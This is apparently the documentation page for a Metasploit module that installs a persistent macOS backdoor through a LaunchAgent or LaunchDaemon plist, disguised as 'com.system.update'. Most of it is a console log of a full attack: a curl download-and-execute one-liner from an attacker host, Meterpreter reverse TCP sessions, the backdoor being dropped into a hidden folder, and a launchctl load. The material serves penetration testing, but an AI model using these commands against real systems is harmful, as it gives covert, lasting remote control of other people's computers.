h00die
4.6 KiB
4.6 KiB
Vulnerable Application
This module provides a persistent boot payload by creating a launch item, which can be
a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered
upon login by a plist entry in ~/Library/LaunchAgents. LaunchDaemons run with
elevated privilleges, and are launched before user login by a plist entry in the ~/Library/LaunchDaemons directory.
In either case the plist entry specifies an executable that will be run before or at login.
Verified on OSX 11.7.10 (Big Sur), 13.7.4 (Ventura)
Verification Steps
- Start msfconsole
- Get a shell
- Do:
use exploit/osx/persistence/launch_plist - Do:
run - You should get a shell.
Options
BACKDOOR_PATH
Path to hide the backdoor on the target. Defaults to ~/Library/.<random>/com.system.update
KEEPALIVE
Continually restart the payload exe if it crashes/exits. Defaults to true
RUN_NOW
Run the installed payload immediately. Defaults to false
LAUNCH_ITEM
Type of launch item, see description for more info. Choices are LaunchAgent, LaunchDaemon. Default is LaunchAgent
Scenarios
13.7.4
Initial access via web delivery
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 8
target => 8
resource (/root/.msf4/msfconsole.rc)> set srvport 8383
srvport => 8383
resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4747
lport => 4747
resource (/root/.msf4/msfconsole.rc)> set URIPATH m
URIPATH => m
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 111.111.1.111:4747
[*] Using URL: http://111.111.1.111:8383/m
[*] Server started.
[*] Run the following command on the target machine:
curl -sk --output 8D4tNTA4 http://111.111.1.111:8383/m; chmod +x 8D4tNTA4; ./8D4tNTA4& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] 222.22.2.2 web_delivery - Delivering Payload (815032 bytes)
[*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49156) at 2025-02-19 19:04:25 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/osx/persistence/launch_plist
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > getuid
Server username: macos
(Meterpreter 1)(/Users/macos) > sysinfo
Computer : 20.20.20.21
OS : macOS Ventura (macOS 13.7.4)
Architecture : x86
BuildTuple : x86_64-apple-darwin
Meterpreter : x64/osx
Persistence
[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) >
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /Users/macos/Library is writable
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/macos/Library/.QVecGcAF/com.system.update
[+] LaunchAgent added: /Users/macos/Library/LaunchAgents/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/macos/Library/.QVecGcAF ; rm /Users/macos/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250219.0704/20.20.20.21_20250219.0704.rc
[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > shell
Process 2138 created.
Channel 8 created.
launchctl load -w /Users/macos/Library/LaunchAgents/com.system.update.plist
[*] Meterpreter session 5 opened (111.111.1.111:4444 -> 222.22.2.2:49157) at 2025-02-19 19:11:23 -0500